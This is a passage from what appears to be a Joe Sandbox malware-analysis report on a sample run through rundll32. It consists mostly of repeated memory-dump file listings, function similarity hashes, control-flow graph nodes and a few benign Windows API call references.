                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: FormatFreeLocalMessage
                          • String ID:
                          • API String ID: 1427518018-0
                          • Opcode ID: 02ae248dc727e5ad0abcdcd8af7b117c20e8862208e73e2bdf3d93fd01def119
                          • Instruction ID: aedc2a569021689e108d0b0ee9a9e186650f58a8dabf2e4a2fd6b9f1b34191f5
                          • Opcode Fuzzy Hash: 02ae248dc727e5ad0abcdcd8af7b117c20e8862208e73e2bdf3d93fd01def119
                          • Instruction Fuzzy Hash: 11110736600A80CED724EFBAD4443E93BA6F348B9CF50511AEA4947B58CB78C589CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: DefaultLanguageSystem
                          • String ID:
                          • API String ID: 4166810957-0
                          • Opcode ID: 4b3f0bc70c23130fb30134ecec6d65e895bedad671c913361aa0c8b291725634
                          • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                          • Opcode Fuzzy Hash: 4b3f0bc70c23130fb30134ecec6d65e895bedad671c913361aa0c8b291725634
                          • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 449 40f1e0-40f204 450 40f206 449->450 451 40f20d-40f25a GetCurrentThreadId 449->451 450->451 452 40f268 451->452 453 40f25c-40f266 451->453 454 40f270-40f2b1 452->454 453->454 455 40f2b3-40f2ba 454->455 456 40f2bc-40f2c2 call 419530 454->456 455->456 457 40f2c5-40f2cd 455->457 456->457 458 40f2e2-40f2e9 457->458 459 40f2cf-40f2d5 457->459 460 40f2f4-40f2fc 458->460 461 40f2eb 458->461 459->458 462 40f310-40f317 460->462 463 40f2fe-40f30a call 409a10 460->463 461->460 465 40f320 call 40f940 462->465 466 40f319 call 40f140 462->466 463->462 471 40f325-40f332 465->471 470 40f31e 466->470 470->471
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0040F24A
                            • Part of subcall function 0040F940: GetCurrentThreadId.KERNEL32 ref: 0040F970
                            • Part of subcall function 0040F940: FreeLibrary.KERNEL32(?,?,?,0040F325), ref: 0040FA49
                            • Part of subcall function 0040F940: ExitProcess.KERNEL32(?,?,?,0040F325), ref: 0040FA9D
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CurrentThread$ExitFreeLibraryProcess
                          • String ID:
                          • API String ID: 274535261-0
                          • Opcode ID: 5d76798660c3ee674eed543055f7b7844446679ac0006f53802a2d53cf229023
                          • Instruction ID: d6b13bc88068144b46f443b650232c52a1b9ff9f41e2cf2a9fe75c7337baa94d
                          • Opcode Fuzzy Hash: 5d76798660c3ee674eed543055f7b7844446679ac0006f53802a2d53cf229023
                          • Instruction Fuzzy Hash: E0314A36604BC8DAD7719F21E8487CA3779F708758F80417ADA4D27BA4CF788A8AC704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 004155BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName
                          • String ID:
                          • API String ID: 514040917-0
                          • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                          • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                          • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                          • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 490 436300-436314 491 436316-436321 490->491 492 43636e-436374 490->492 491->492 493 436323-436369 call 411140 CreateFileW 491->493 493->492
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 284c0e5acaf1a39cf53334d5868b45d7cac6dafcafc8e2c2b16519ba11dc2266
                          • Instruction ID: d3c8a1eeb71ef1c90a0784c7f1fd121a30001ba4d6e3ee18811ea5d7b0f81f86
                          • Opcode Fuzzy Hash: 284c0e5acaf1a39cf53334d5868b45d7cac6dafcafc8e2c2b16519ba11dc2266
                          • Instruction Fuzzy Hash: 99F0F072A1565186F7309B10E8C138E7210F388778F4A8329DEA8073D0CB7C88098784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
